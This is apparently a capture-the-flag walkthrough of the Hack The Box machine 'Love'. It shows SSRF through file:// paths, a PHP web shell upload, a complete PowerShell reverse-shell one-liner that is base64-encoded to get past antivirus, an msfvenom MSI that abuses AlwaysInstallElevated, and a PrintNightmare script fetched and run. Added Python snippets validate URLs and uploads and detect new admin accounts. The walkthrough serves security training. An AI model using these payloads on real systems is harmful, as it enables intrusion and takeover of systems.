Love from Hack The Box hosts a voting system application and an online file scanner. The file scanner is vulnerable to SSRF, which can be exploited to leak a set of credentials that can be used to login into the voting app. The photo upload functionality can be leveraged to drop a web shell, which is then used to gain interactive shell access on the machine. Enumeration of the system reveals that AlwaysInstallElevated is enabled, and this can be leveraged to install a malicious .msi installer and get SYSTEM access.

Skills Learned

  • SSRF
  • Abusing Windows AlwaysInstallElevated
  • (Alternative) PrintNightmare LPE

Tools Used

  • Nmap
  • Burp Suite
  • WinPEAS
  • msfvenom



A full TCP scan discovers a bunch of open ports.

→ kali@kali «love» «» 
$ fscan love
nmap -p- --min-rate=1000 | grep '^[0-9]' | cut -d '/' -f1 | tr '\n' ',' | sed 's/,$//'
nmap -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670 -sC -sV -oA nmap/10-tcp-allport-love
Starting Nmap 7.91 ( ) at 2021-08-08 11:29 EDT
Nmap scan report for
Host is up (0.087s latency).

80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject:
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, NULL, NotesRPC, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest, oracle-tns: 
|_    Host '' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-08-08T15:53:52+00:00; +21m37s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Hosts:, LOVE,; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h06m37s, deviation: 3h30m01s, median: 21m36s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-08T08:53:41-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-08-08T15:53:43
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds

Most notable services are:

  • An Apache web server serving three sites on ports 80, 443 and 5000 (the last one returns 403 Forbidden).
  • SMB on port 445, a good start.
  • A MySQL/MariaDB server on port 3306; I will leave it alone for now because it rejects connections from my IP.
  • WinRM on 5985/5986, which I will use for lateral movement once I have credentials.

Seeing Apache and MySQL on a Windows host, I can assume that this machine uses XAMPP.

Nmap also identified two hostnames: and I will add these to my /etc/hosts.

→ root@kali «love» «» 
$ sudo echo '' >> /etc/hosts


TCP 445 - SMB

Anonymous login is not allowed here; I will revisit this later once I have credentials.

→ root@kali «love» «» 
$ smbclient -N -L // 
session setup failed: NT_STATUS_ACCESS_DENIED

TCP 5000

Visiting this port returns a 403 Forbidden error.


TCP 80 - Website

Visiting port 80 with the IP or the hostname returns the same content.

→ kali@kali «love» «» 
$ for i in; do echo -n "$i "; curl -s $i | wc -c; done              4388 4388

On the browser, the site displays a login form of a Voting System app.


Trying some random IDs and common passwords didn’t work here.



Gobuster discovers a bunch of directories, but one that stands out is /admin.

→ kali@kali «love» «» 
$ gobuster dir -f -u -w /opt/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x txt,php -o gobuster/gobuster-S-80 -t 40                                                                                                                                                           
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Add Slash:               true
[+] Timeout:                 10s
2021/08/08 13:16:14 Starting gobuster in directory enumeration mode
/cgi-bin/             (Status: 403) [Size: 302]
/admin/               (Status: 200) [Size: 6198]
/includes/            (Status: 200) [Size: 2261]
/plugins/             (Status: 200) [Size: 2490]
/images/              (Status: 200) [Size: 2719]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/webalizer/           (Status: 403) [Size: 302]              
/home.php             (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 4388]             
/phpmyadmin/          (Status: 403) [Size: 302]              
/icons/               (Status: 200) [Size: 74798]            
/preview.php          (Status: 302) [Size: 0] [--> index.php]
/examples/            (Status: 503) [Size: 402]              
/dist/                (Status: 200) [Size: 1389]             
/tcpdf/               (Status: 200) [Size: 2710]             
/licenses/            (Status: 403) [Size: 421]              
/server-status/       (Status: 403) [Size: 421]              
/con.php              (Status: 403) [Size: 302]              
/con/                 (Status: 403) [Size: 302]              
/con.txt              (Status: 403) [Size: 302]              
/aux/                 (Status: 403) [Size: 302]              
/aux.php              (Status: 403) [Size: 302]              
/aux.txt              (Status: 403) [Size: 302]              
2021/08/08 13:18:01 Finished


When I visit /admin, the page presents the same login form, but this time it asks for a username instead of a voter ID.


Submitting several credentials only reveals that admin is a valid username here.

TCP 80 -

On, the site provides an online file scanner.


The “Demo” menu points to /beta.php, which lets a visitor submit a URL.


With a netcat listener running, I submitted my HTB IP there, and the listener received the following request.

→ kali@kali «love» «» 
$ nc -nvlp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 49806
GET /iamf HTTP/1.1
Accept: */*

Based on the received request, I’m guessing it was made with PHP curl. Had the user agent contained “WindowsPowerShell”, I would have used Responder to see if I could capture the NTLMv2 response.

Playing a bit with it reveals that it can render HTML.


The key takeaway here is that can make an HTTP request.

TCP 443 - Website

On HTTPS, the SSL certificate leaks an email address and a potential username: roy@love.htb.


Both the HTTPS versions of and return the Forbidden error.




Shell as phoebe


The file scanner’s habit of fetching a user-supplied URL on the server’s behalf (not necessarily over HTTP, as the file:// scheme shows next) can be abused to reach internal resources that were inaccessible earlier because of IP restrictions. This attack is known as Server-Side Request Forgery (SSRF).

When I submit file:///C:/xampp/apache/conf/extra/httpd-vhosts.conf, it returns the virtual host configuration file.


The string “C:/xampp/htdocs/passwordmanager” immediately draws my attention. Based on that config, the service on port 5000 is a password manager, and access is restricted to connections from

Assuming there is an index file, I submit file:///C:/xampp/htdocs/passwordmanager/index.php, and the file exists.


Now if I submit file:///C:/xampp/htdocs/passwordmanager/creds.txt, it returns the following:


Alternatively, I can just visit and the file scanner will render the password manager page, which contains the admin credentials.
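The root cause above is that the scanner will fetch whatever scheme and host it is given, including file:// paths and the loopback-only vhost on port 5000. As an added example (not code from the write-up or from the scanner application), this is the kind of check that would have closed both paths; the function, constant and resolver names are mine, and the resolver parameter exists so the checks can run offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical policy for an outbound "file scanner": fetch only public web
# origins on the two default ports. file://, gopher:// etc. never qualify.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_host(host):
    """Resolve a hostname to its addresses (replaceable so tests run offline)."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


def is_safe_scan_url(url, resolver=resolve_host):
    """Return (ok, reason) for a user-supplied URL before the server fetches it.

    Rejects anything that is not plain http/https, any non-default port
    (so an internal vhost such as one bound to :5000 cannot be reached),
    and any host that resolves to a loopback, link-local, private or
    otherwise non-public address."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = resolver(host)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False, "host does not resolve"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if not ip.is_global:
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"
```

The address that passed validation must also be the one actually connected to (resolve once, connect to that IP), otherwise a DNS rebinding trick can still land the request on a loopback address.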


I can use those credentials to access the admin dashboard.


PHP webshell

On admin/voters.php, there is a photo upload feature.


I intercept the request, replace the photo content with a PHP web shell, and forward it. It uploads without complaint.


When I reload the page, the voter I added is listed with a broken photo, because the page is loading my PHP web shell as an image.


The uploaded web shell is accessible at, and now I have code execution as phoebe.
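The upload went through because the photo field was never checked for type or content and the file kept a name the web server would execute. As an added example (not the voting system's own code), here is a check for that field that accepts only image extensions whose magic bytes agree with the name, refuses any file carrying a PHP open tag, and stores the upload under a server-generated name; the function and constant names are mine.

```python
import os
import re
import uuid

# Hypothetical policy for the voter "photo" field: extension allow-list,
# magic bytes must agree with the extension, no PHP open tag anywhere in
# the bytes, and the stored name is generated by the server.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
# PHP happily executes code placed after a valid image header, so a correct
# magic number alone proves nothing; look for the open tag as well.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_photo(filename, data, max_bytes=2 * 1024 * 1024):
    """Return (True, server_generated_name) or (False, reason)."""
    if not data or len(data) > max_bytes:
        return False, "empty or oversized upload"
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    if ext == ".jpeg":
        ext = ".jpg"
    for signature, canonical in MAGIC.items():
        if data.startswith(signature):
            break
    else:
        return False, "not a recognised image"
    if canonical != ext:
        return False, f"content is {canonical} but name says {ext}"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag found inside image data"
    # Never reuse the client's name: Apache's multiple-extension handling can
    # treat "x.php.jpg" as PHP, and a fresh name removes path tricks as well.
    return True, uuid.uuid4().hex + canonical
```

The second layer, independent of this check, is to serve the images directory with the PHP handler disabled so that nothing stored there can execute even if a check is bypassed.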


Interactive shell access

To get an interactive shell I will use a PowerShell one-liner reverse shell.

→ kali@kali «love» «» 
$ cat exploits/revshell.ps1
$client = New-Object System.Net.Sockets.TCPClient('',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Because it is a Windows machine, I will encode it in base64 to get past AV.

→ kali@kali «love» «» 
$ cat exploits/revshell.ps1| iconv -t UTF-16LE| base64 -w0


On my listener:

→ kali@kali «love» «» 
$ rlwrap nc -nvlp 53
listening on [any] 53 ...
connect to [] from (UNKNOWN) [] 49950

PS C:\xampp\htdocs\omrs\images>

The user flag is on Phoebe’s desktop.

PS C:\Users\Phoebe\Desktop> dir

    Directory: C:\Users\Phoebe\Desktop

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---          8/8/2021   3:50 AM             34 user.txt                                                             

PS C:\Users\Phoebe\Desktop> type user.txt

The flag is also readable through the SSRF.


Privilege Escalation

Shell as SYSTEM


WinPEAS finds that AlwaysInstallElevated is set to 1 in both hives. This means a Windows Installer package always installs with elevated privileges (as SYSTEM), which can be abused by installing a malicious .msi package.

[+] Checking AlwaysInstallElevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

Exploitation - Malicious .msi Installer

I will use msfvenom to generate a malicious .msi that adds a user with administrative access.

→ kali@kali «exploits» «» 
$ msfvenom -p windows/adduser USER=iamf PASS=P@ssword123! -f msi -o iamf.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 270 bytes
Final size of msi file: 159744 bytes
Saved as: iamf.msi

I will host the .msi with a Python web server.

On Love, I grab the .msi and install the package straight away.

PS C:\Users\Public> curl.exe -O
PS C:\Users\Public> msiexec /quiet /qn /i iamf.msi
PS C:\Users\Public> net user

User accounts for \\LOVE                                                                                                                                                   
Administrator            DefaultAccount           Guest                                                                                                                    
iamf                     Phoebe                   WDAGUtilityAccount                                                                                                       
The command completed successfully.                                                                                                                                        

PS C:\Users\Public> 
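The adduser payload above creates a local account and puts it in the Administrators group while running as SYSTEM under the elevated installer. On the defender's side that leaves a pair of Security-log events, 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group). As an added example, not from the write-up, here is a small correlation over constructed events that flags accounts created and promoted to Administrators within seconds, and separates out the ones where the acting subject was SYSTEM; the sample records and function names are mine.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=30)

# Constructed Security-log sample (not taken from the box). Each dict holds the
# fields a SIEM extracts from 4720 (account created) and 4732 (member added to a
# security-enabled local group): who acted ("subject") and on whom ("target").
SAMPLE_EVENTS = [
    {"time": "2021-08-08T16:02:11", "id": 4720, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "iamf", "group": None},
    {"time": "2021-08-08T16:02:11", "id": 4732, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "iamf", "group": "Administrators"},
    {"time": "2021-08-08T09:15:00", "id": 4720, "subject": "LOVE\\Administrator",
     "target": "svc_backup", "group": None},
    {"time": "2021-08-08T09:15:02", "id": 4732, "subject": "LOVE\\Administrator",
     "target": "svc_backup", "group": "Backup Operators"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_new_local_admins(events, window=WINDOW):
    """Return (account, subject, created_at) for every account that was created
    (4720) and added to Administrators (4732) within `window` of its creation."""
    created = {e["target"]: e for e in events if e["id"] == 4720}
    hits = []
    for e in events:
        if e["id"] != 4732 or e["group"] != "Administrators":
            continue
        origin = created.get(e["target"])
        if origin is None:
            continue
        if timedelta(0) <= _ts(e) - _ts(origin) <= window:
            hits.append((e["target"], e["subject"], origin["time"]))
    return hits


def system_created_admins(events, window=WINDOW):
    """The subset acted on by SYSTEM: an interactive admin creating an account
    shows up under that admin's name, whereas a payload run by the elevated
    installer service (as on this box) acts as NT AUTHORITY\\SYSTEM."""
    return [h for h in find_new_local_admins(events, window)
            if h[1].upper().endswith("\\SYSTEM")]
```

The fix itself is to set AlwaysInstallElevated to 0 (or remove it) in both HKLM and HKCU, since the policy only takes effect when both values are 1.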

Psexec - SYSTEM

I can log in using my backdoor user with the help of

→ root@kali «exploits» «» 
$ love/iamf:'P@ssword123!'@                                            
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file VlzRTIEE.exe
[*] Opening SVCManager on
[*] Creating service lRbn on
[*] Starting service lRbn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

nt authority\system

(Alternative) PrintNightmare

Love is also vulnerable to the PrintNightmare LPE.

PS C:\Users\Phoebe\Downloads> Get-Service -name spooler

Status   Name               DisplayName
------   ----               -----------
Running  spooler            Print Spooler
PS C:\Users\Phoebe\Downloads> curl.exe -O
PS C:\Users\Phoebe\Downloads> Import-Module .\CVE-2021-1675.ps1
PS C:\Users\Phoebe\Downloads> Invoke-Nightmare
PS C:\Users\Phoebe\Downloads> net user

User accounts for \\LOVE

adm1n                    Administrator            DefaultAccount           
Guest                    iamf                     Phoebe                   
The command completed successfully.

I can log in via WinRM.

→ kali@kali «love» «» 
$ evil-winrm -i -u 'adm1n' -p'P@ssw0rd'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\adm1n\Documents> hostname